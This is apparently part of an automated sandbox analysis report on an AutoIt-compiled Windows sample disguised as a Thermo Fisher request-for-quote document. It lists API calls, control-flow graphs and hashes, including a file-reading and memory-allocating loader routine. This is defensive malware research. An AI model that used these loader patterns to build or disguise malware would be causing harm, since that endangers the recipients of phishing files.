                                                              • _wcscat.LIBCMT ref: 0064FACA
                                                              • _wcscat.LIBCMT ref: 0064FAE8
                                                              • _wcscpy.LIBCMT ref: 0064FB09
                                                              • __wsplitpath.LIBCMT ref: 0064FBE6
                                                              • _wcscpy.LIBCMT ref: 0064FC0B
                                                              • _wcscpy.LIBCMT ref: 0064FC1D
                                                              • _wcscpy.LIBCMT ref: 0064FC32
                                                              • _wcscat.LIBCMT ref: 0064FC47
                                                              • _wcscat.LIBCMT ref: 0064FC59
                                                              • _wcscat.LIBCMT ref: 0064FC6E
                                                                • Part of subcall function 0064BFA4: _wcscmp.LIBCMT ref: 0064C03E
                                                                • Part of subcall function 0064BFA4: __wsplitpath.LIBCMT ref: 0064C083
                                                                • Part of subcall function 0064BFA4: _wcscpy.LIBCMT ref: 0064C096
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0A9
                                                                • Part of subcall function 0064BFA4: __wsplitpath.LIBCMT ref: 0064C0CE
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0E4
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2k
                                                              • API String ID: 2955681530-1443425849
                                                              • Opcode ID: 5f0a18bb977ce2e637bbe8f977073772248fa612e63754f3e786ed61083c7d08
                                                              • Instruction ID: ccb3f12d4085684cf5ba258a8228c19584d95b57945b9a534ac961f9e3f9ad03
                                                              • Opcode Fuzzy Hash: 5f0a18bb977ce2e637bbe8f977073772248fa612e63754f3e786ed61083c7d08
                                                              • Instruction Fuzzy Hash: DD91A171604705AFDB64EB54C891E9BB3EAFF84300F04486DF98997292DB30EA44CF96

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00603F86
                                                              • RegisterClassExW.USER32(00000030), ref: 00603FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00603FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00603FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00603FEE
                                                              • LoadIconW.USER32(000000A9), ref: 00604004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00604013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 7d1e6f6fce2be5e38c5dce0ce7066c3ad90687c1e93b0a93d3efe5faa4a5f138
                                                              • Instruction ID: 3b0e207726acf3b2cac9472e52881e909cf92d5dad7313a0e937f6c84937ebf6
                                                              • Opcode Fuzzy Hash: 7d1e6f6fce2be5e38c5dce0ce7066c3ad90687c1e93b0a93d3efe5faa4a5f138
                                                              • Instruction Fuzzy Hash: 8921D8B5D00319AFDB00EFA5EC89BDDBBB6FB0A710F10521AF511AA2A0D7B54544CFA1

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0064BDB4: __time64.LIBCMT ref: 0064BDBE
                                                                • Part of subcall function 00604517: _fseek.LIBCMT ref: 0060452F
                                                              • __wsplitpath.LIBCMT ref: 0064C083
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscpy.LIBCMT ref: 0064C096
                                                              • _wcscat.LIBCMT ref: 0064C0A9
                                                              • __wsplitpath.LIBCMT ref: 0064C0CE
                                                              • _wcscat.LIBCMT ref: 0064C0E4
                                                              • _wcscat.LIBCMT ref: 0064C0F7
                                                              • _wcscmp.LIBCMT ref: 0064C03E
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C65D
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0064C2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064C338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064C34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0064C35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0064C371
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID:
                                                              • API String ID: 2378138488-0
                                                              • Opcode ID: 548ddf0f6b40c740c43677ddcaf708efdcb515c80657c6c97a63f93c19e6563f
                                                              • Instruction ID: 39f17d952d00a7c18bd879ea20b6da22ab375551af1b270e76268bd8d88752fa
                                                              • Opcode Fuzzy Hash: 548ddf0f6b40c740c43677ddcaf708efdcb515c80657c6c97a63f93c19e6563f
                                                              • Instruction Fuzzy Hash: FBC13DB1E00129ABDF65DF95CC81EDEB7BEEF49310F0040AAF609E6251DB709A448F65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 957 603742-603762 959 6037c2-6037c4 957->959 960 603764-603767 957->960 959->960 961 6037c6 959->961 962 6037c8 960->962 963 603769-603770 960->963 964 6037ab-6037b3 DefWindowProcW 961->964 965 671e00-671e2e call 602ff6 call 61e312 962->965 966 6037ce-6037d1 962->966 967 603776-60377b 963->967 968 60382c-603834 PostQuitMessage 963->968 970 6037b9-6037bf 964->970 1000 671e33-671e3a 965->1000 971 6037d3-6037d4 966->971 972 6037f6-60381d SetTimer RegisterWindowMessageW 966->972 974 603781-603783 967->974 975 671e88-671e9c call 644ddd 967->975 969 6037f2-6037f4 968->969 969->970 980 671da3-671da6 971->980 981 6037da-6037ed KillTimer call 603847 call 60390f 971->981 972->969 976 60381f-60382a CreatePopupMenu 972->976 977 603836-603840 call 61eb83 974->977 978 603789-60378e 974->978 975->969 994 671ea2 975->994 976->969 995 603845 977->995 984 603794-603799 978->984 985 671e6d-671e74 978->985 988 671ddc-671dfb MoveWindow 980->988 989 671da8-671daa 980->989 981->969 992 671e58-671e68 call 6455bd 984->992 993 60379f-6037a5 984->993 985->964 999 671e7a-671e83 call 63a5f3 985->999 988->969 996 671dac-671daf 989->996 997 671dcb-671dd7 SetFocus 989->997 992->969 993->964 993->1000 994->964 995->969 996->993 1001 671db5-671dc6 call 602ff6 996->1001 997->969 999->964 1000->964 1005 671e40-671e53 call 603847 call 604ffc 1000->1005 1001->969 1005->964
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 006037B3
                                                              • KillTimer.USER32(?,00000001), ref: 006037DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00603800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060380B
                                                              • CreatePopupMenu.USER32 ref: 0060381F
                                                              • PostQuitMessage.USER32(00000000), ref: 0060382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 563e2afb23a30567fd1f6a21078f1d1f8ce526792084d585204b14e060a89b9b
                                                              • Instruction ID: af87666e35149b1f1d320bc9fb5039a327568b5b74004ed50dfed46eb0473e45
                                                              • Opcode Fuzzy Hash: 563e2afb23a30567fd1f6a21078f1d1f8ce526792084d585204b14e060a89b9b
                                                              • Instruction Fuzzy Hash: 2F4136F028016AABCB185F289C4AFBB365FFB42302F040519F9029A3D2DB61CE518779

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00603E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00603E88
                                                              • LoadIconW.USER32(00000063), ref: 00603E9E
                                                              • LoadIconW.USER32(000000A4), ref: 00603EB0
                                                              • LoadIconW.USER32(000000A2), ref: 00603EC2
                                                                • Part of subcall function 00604024: LoadImageW.USER32(00600000,00000063,00000001,00000010,00000010,00000000), ref: 00604048
                                                              • RegisterClassExW.USER32(?), ref: 00603F30
                                                                • Part of subcall function 00603F53: GetSysColorBrush.USER32(0000000F), ref: 00603F86
                                                                • Part of subcall function 00603F53: RegisterClassExW.USER32(00000030), ref: 00603FB0
                                                                • Part of subcall function 00603F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00603FC1
                                                                • Part of subcall function 00603F53: InitCommonControlsEx.COMCTL32(?), ref: 00603FDE
                                                                • Part of subcall function 00603F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00603FEE
                                                                • Part of subcall function 00603F53: LoadIconW.USER32(000000A9), ref: 00604004
                                                                • Part of subcall function 00603F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00604013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: bc5adb6d52b74679a74ef8be3ff15ffe92bd8b9511467f8b5eed49873f4fdd38
                                                              • Instruction ID: df0742b7f9de27cd12a0875478c2f51d1485b29f7883b0197968ef36e0063932
                                                              • Opcode Fuzzy Hash: bc5adb6d52b74679a74ef8be3ff15ffe92bd8b9511467f8b5eed49873f4fdd38
                                                              • Instruction Fuzzy Hash: 2A2153B0E00304AFCB04DFA9EC45EA9BFF7FB4A310F14522AE204A63A1D77585508F91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1021 d4c608-d4c6b6 call d49fc8 1024 d4c6bd-d4c6e3 call d4d518 CreateFileW 1021->1024 1027 d4c6e5 1024->1027 1028 d4c6ea-d4c6fa 1024->1028 1029 d4c835-d4c839 1027->1029 1035 d4c701-d4c71b VirtualAlloc 1028->1035 1036 d4c6fc 1028->1036 1030 d4c87b-d4c87e 1029->1030 1031 d4c83b-d4c83f 1029->1031 1037 d4c881-d4c888 1030->1037 1033 d4c841-d4c844 1031->1033 1034 d4c84b-d4c84f 1031->1034 1033->1034 1038 d4c851-d4c85b 1034->1038 1039 d4c85f-d4c863 1034->1039 1040 d4c722-d4c739 ReadFile 1035->1040 1041 d4c71d 1035->1041 1036->1029 1042 d4c8dd-d4c8f2 1037->1042 1043 d4c88a-d4c895 1037->1043 1038->1039 1046 d4c865-d4c86f 1039->1046 1047 d4c873 1039->1047 1048 d4c740-d4c780 VirtualAlloc 1040->1048 1049 d4c73b 1040->1049 1041->1029 1044 d4c8f4-d4c8ff VirtualFree 1042->1044 1045 d4c902-d4c90a 1042->1045 1050 d4c897 1043->1050 1051 d4c899-d4c8a5 1043->1051 1044->1045 1046->1047 1047->1030 1054 d4c787-d4c7a2 call d4d768 1048->1054 1055 d4c782 1048->1055 1049->1029 1050->1042 1052 d4c8a7-d4c8b7 1051->1052 1053 d4c8b9-d4c8c5 1051->1053 1056 d4c8db 1052->1056 1057 d4c8c7-d4c8d0 1053->1057 1058 d4c8d2-d4c8d8 1053->1058 1061 d4c7ad-d4c7b7 1054->1061 1055->1029 1056->1037 1057->1056 1058->1056 1062 d4c7b9-d4c7e8 call d4d768 1061->1062 1063 d4c7ea-d4c7fe call d4d578 1061->1063 1062->1061 1069 d4c800 1063->1069 1070 d4c802-d4c806 1063->1070 1069->1029 1071 d4c812-d4c816 1070->1071 1072 d4c808-d4c80c CloseHandle 1070->1072 1073 d4c826-d4c82f 1071->1073 1074 d4c818-d4c823 VirtualFree 1071->1074 1072->1071 1073->1024 1073->1029 1074->1073
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D4C6D9
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D4C8FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                              • Instruction ID: c5151ab24c9fc64e285868e5d8ef1d736f571084ad01c091168b3c40b3f16245
                                                              • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                              • Instruction Fuzzy Hash: 41A11574E11209EBDB54CFA4C898BEEBBB5FF48304F249159E501BB280D7759A81CFA4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1130 6049fb-604a25 call 60bcce RegOpenKeyExW 1133 6741cc-6741e3 RegQueryValueExW 1130->1133 1134 604a2b-604a2f 1130->1134 1135 674246-67424f RegCloseKey 1133->1135 1136 6741e5-674222 call 61f4ea call 6047b7 RegQueryValueExW 1133->1136 1141 674224-67423b call 606a63 1136->1141 1142 67423d-674245 call 6047e2 1136->1142 1141->1142 1142->1135
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00604A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006741DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0067421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00674249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: 4bf609a27f67a9586f83c62814b2b0f21d3855eb648abcff4b7ad4b9972cf9fe
                                                              • Instruction ID: 0a87fec3c3401483d179af0aa810aae85ec47a469d49c30283cfabd4312275a7
                                                              • Opcode Fuzzy Hash: 4bf609a27f67a9586f83c62814b2b0f21d3855eb648abcff4b7ad4b9972cf9fe
                                                              • Instruction Fuzzy Hash: DD116DB1640109BEEB14ABA4CD86DFF7BADEF08344F005068B506D6191EF709E01D764

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1157 6036b8-603728 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006036E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 0060371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 00603724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: 314d6a198099b7cfb25c57249da50265460e157dab0d2ad8585b4dab6d25e305
                                                              • Instruction ID: 1463be588c434e97b1240e93584f07da43f67a294aab23a864096d8dc9ec078e
                                                              • Opcode Fuzzy Hash: 314d6a198099b7cfb25c57249da50265460e157dab0d2ad8585b4dab6d25e305
                                                              • Instruction Fuzzy Hash: DEF0F4716402D47AEB315757AC08E773E7FEBC7F60F01111FBA04961B1C96508A5DAB0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1262 d4c378-d4c4f9 call d49fc8 call d4c268 CreateFileW 1269 d4c500-d4c510 1262->1269 1270 d4c4fb 1262->1270 1273 d4c517-d4c531 VirtualAlloc 1269->1273 1274 d4c512 1269->1274 1271 d4c5b3-d4c5b8 1270->1271 1275 d4c535-d4c54f ReadFile 1273->1275 1276 d4c533 1273->1276 1274->1271 1277 d4c551 1275->1277 1278 d4c553-d4c58d call d4c2a8 call d4b268 1275->1278 1276->1271 1277->1271 1283 d4c58f-d4c5a4 call d4c2f8 1278->1283 1284 d4c5a9-d4c5b1 ExitProcess 1278->1284 1283->1284 1284->1271
                                                              APIs
                                                                • Part of subcall function 00D4C268: Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D4C4EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: 6OX4Z2F8MEINKKTJBSQ4M7A556YHOK
                                                              • API String ID: 2694422964-1931182647
                                                              • Opcode ID: 904d8ec4b3ba76680d4f5bb2bce241467c8feb49f925362bf2d26fa29bb686ce
                                                              • Instruction ID: ee89bd1eed896ae317552f9b857a1e6455d4ff9936165ea953fd84e3d5d56985
                                                              • Opcode Fuzzy Hash: 904d8ec4b3ba76680d4f5bb2bce241467c8feb49f925362bf2d26fa29bb686ce
                                                              • Instruction Fuzzy Hash: 26718C30D14288DBEF11CBA4C8447EEBB75AF19304F044199E648BB2C1DBBA5A49CB76

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00605374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C1148,?,006061FF,?,00000000,00000001,00000000), ref: 00605392
                                                                • Part of subcall function 006049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00604A1D
                                                              • _wcscat.LIBCMT ref: 00672D80
                                                              • _wcscat.LIBCMT ref: 00672DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: 8!l$\$\Include\
                                                              • API String ID: 3592542968-4245525183
                                                              • Opcode ID: 41fc989bd4ec3fb0dd06745802b4f883fcced18050a8e26c4c27ca58fef67e20
                                                              • Instruction ID: 34a721a07853ddac26976ef1fd28f8b82aea44b029f7cf58c0a15f6ef73a9459
                                                              • Opcode Fuzzy Hash: 41fc989bd4ec3fb0dd06745802b4f883fcced18050a8e26c4c27ca58fef67e20
                                                              • Instruction Fuzzy Hash: CC51A3B14043418FC758EF55E8A1CABB7FBBF59300B44552EFB45836A1DB709608CB56
                                                              APIs
                                                              • _memset.LIBCMT ref: 0060522F
                                                              • _wcscpy.LIBCMT ref: 00605283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00605293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00673CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: ee81f209ba7474d6cd268005cba3661693c330150e23dc085bdd8e0c3b3468b2
                                                              • Instruction ID: f4c41b1ece66a53ac47b77c86b16ace3cc8da229d95042c7f0f4750e475f833d
                                                              • Opcode Fuzzy Hash: ee81f209ba7474d6cd268005cba3661693c330150e23dc085bdd8e0c3b3468b2
                                                              • Instruction Fuzzy Hash: 7D31D271148740AFD368EB50EC46FEB77DAAF46300F00451EF586961D2EB70A6588B9B
                                                              APIs
                                                                • Part of subcall function 006041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006039FE,?,00000001), ref: 006041DB
                                                              • _free.LIBCMT ref: 006736B7
                                                              • _free.LIBCMT ref: 006736FE
                                                                • Part of subcall function 0060C833: __wsplitpath.LIBCMT ref: 0060C93E
                                                                • Part of subcall function 0060C833: _wcscpy.LIBCMT ref: 0060C953
                                                                • Part of subcall function 0060C833: _wcscat.LIBCMT ref: 0060C968
                                                                • Part of subcall function 0060C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0060C978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
